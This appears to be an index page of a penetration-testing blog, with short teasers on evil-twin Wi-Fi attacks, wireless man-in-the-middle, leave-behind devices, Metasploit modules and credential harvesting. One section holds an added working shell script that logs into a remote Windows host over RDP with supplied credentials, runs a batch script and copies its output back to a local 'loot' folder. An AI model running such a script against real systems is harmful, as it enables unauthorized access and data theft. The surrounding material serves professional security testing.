TL;DR: Installing hostapd-wpe on a wireless router powered by an external power bank provides a standalone wireless attack platform with good transmit power, concealability, and mobility. Despite being almost 5 years old (but recently updated to support hostapd 2.6), hostapd-wpe is still a go-to tool for assessing the security of wireless clients attached to WPA2 Enterprise ...
Evil AP Attacks with Spoofed Certificates
We've written in the past about the "Evil twin" or "Evil AP" attack using hostapd-wpe ("wireless pwnage edition"). This remains a viable attack in environments using enterprise authentication, and the patched hostapd obviates the need for a wireless access point, making the attack easy and portable. However, like most attacks there are still opportunities for tweaking and ...
CTF Example – Web Application Security
During RSM's 2016 Capture the Flag (CTF) event, the Web Application Security category took the format of a full-blown web application penetration test. Participants could accomplish the 100 point challenge simply by exploring and mapping out the web application. By the time participants reached the 500 point level, they had performed password guessing, SQL injection, bypassed ...
Approaches for Wireless Man-in-the-Middle
The wireless medium is inherently susceptible to man-in-the-middle attacks. Whether the objective of such an attack is to capture traffic, or simply to make an "evil" access point more believable by connecting clients to the Internet, there are a few different approaches one can take to insert oneself between the target(s) and the Internet. This post explores two of ...
Create an Encrypted Leave-Behind Device
Consider this scenario: You've breached the physical perimeter of the target organization. Once inside, you need to establish some means of remote network access, whether for yourself or your teammates waiting on the outside. In this example, this takes the form of a device you plug in to an unattended network jack within the target organization. Whether you call this ...
Scripting RDP for Pillaging and Potato
Previous posts on the WarRoom have addressed expediting the use of remote desktop to facilitate pillaging. This post explores scripting commands through an RDP client to serve that same purpose. The end result is a one-liner that will log in to a remote system, attach a local directory, execute a script, and save the output to that same local directory, provided the attacker has ...
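The one-liner described in that teaser, reconstructed here as an added example (this is not the post's own script): rdesktop's `-r disk:<name>=<path>` redirects a local directory into the session, where Windows exposes it as `\\tsclient\<name>`, and `-s` asks the server to start a program instead of the desktop shell. The host, account, share name `loot`, and script name `collect.bat` are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the original post. Builds and (optionally) runs an
# rdesktop one-liner that mounts a local loot directory into the session,
# runs a batch script from it, and writes the script's output back to it.

# The command executed on the Windows side. The redirected drive is reachable
# as \\tsclient\loot, so both the script and its output live in our local dir.
rdp_remote_cmd() {
  script=$1
  printf '%s\n' 'cmd.exe /c \\tsclient\loot\'"$script"' > \\tsclient\loot\output.txt 2>&1'
}

# Usage: run_rdp_pillage HOST USER PASS LOOTDIR SCRIPT
# Set DRY_RUN=1 to print the assembled command instead of executing it.
run_rdp_pillage() {
  host=$1 user=$2 pass=$3 lootdir=$4 script=$5
  mkdir -p "$lootdir"
  if [ ! -f "$lootdir/$script" ]; then
    echo "run_rdp_pillage: $lootdir/$script not found" >&2
    return 1
  fi
  remote_cmd=$(rdp_remote_cmd "$script")
  if [ -n "$DRY_RUN" ]; then
    printf 'rdesktop -u %s -p %s -r disk:loot=%s -s "%s" %s\n' \
      "$user" "$pass" "$lootdir" "$remote_cmd" "$host"
    return 0
  fi
  # Pass "-" as the password to have rdesktop read it from stdin instead of
  # leaving it visible in the process list.
  rdesktop -u "$user" -p "$pass" -r "disk:loot=$lootdir" -s "$remote_cmd" "$host"
}

# Example invocation (hypothetical target and credentials):
#   DRY_RUN=1 run_rdp_pillage 192.0.2.10 'CORP\jsmith' - /tmp/loot collect.bat
```

Two caveats a practitioner will hit: the `-s` "alternate shell" is only honored when the server permits a startup program for the session (the Remote Desktop Services "Start a program on connection" setting or the equivalent per-user environment option); otherwise the normal desktop appears and nothing runs. And drive redirection can be disabled server-side, in which case `\\tsclient\loot` will not exist and the batch script never starts, so check that the redirected drive appears before assuming the output file will be written.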
Ghosts in the Machines
Methods for the prevention, detection, and removal of ghosts in digital networks
We often find that clients are so focused on preventing attacks from malicious living humans that they completely neglect the threat posed by ghosts. With that in mind, today’s post focuses on defensive measures that can be implemented to (1) prevent ghost infestations; (2) detect paranormal ...
Launch rdesktop from Metasploit
I often resort to remote desktop sessions when pillaging or attempting lateral escalation. Remote desktop provides an easy way to look for important data, get an idea of what applications are in use, run scripts or programs, and transfer data between my host and the target system. Since the Windows “Remote Desktop Connection” program keeps track of IP addresses and makes it ...
Metasploit Module of the Month – enum_ad_computers
Summer has officially ended and Autumn is setting in. As the leaves begin to fall and September draws to a close, it’s a perfect time to sit back and reflect on the Metasploit modules that filled our Summer months with joy. In the third installment of our “Module of the Month” series we examine enum_ad_computers, a post-exploitation module that combines the flexibility of LDAP ...
Retrieving Credentials from Configuration Files
“Security is not convenient.” Though blunt, this phrase neatly captures the fundamental conflict between typical users and information security personnel. Typical users want their workstations and networks to be configured for speed, accessibility, and convenience, whereas security professionals prioritize tight access control and monitoring. If you believe that security is ...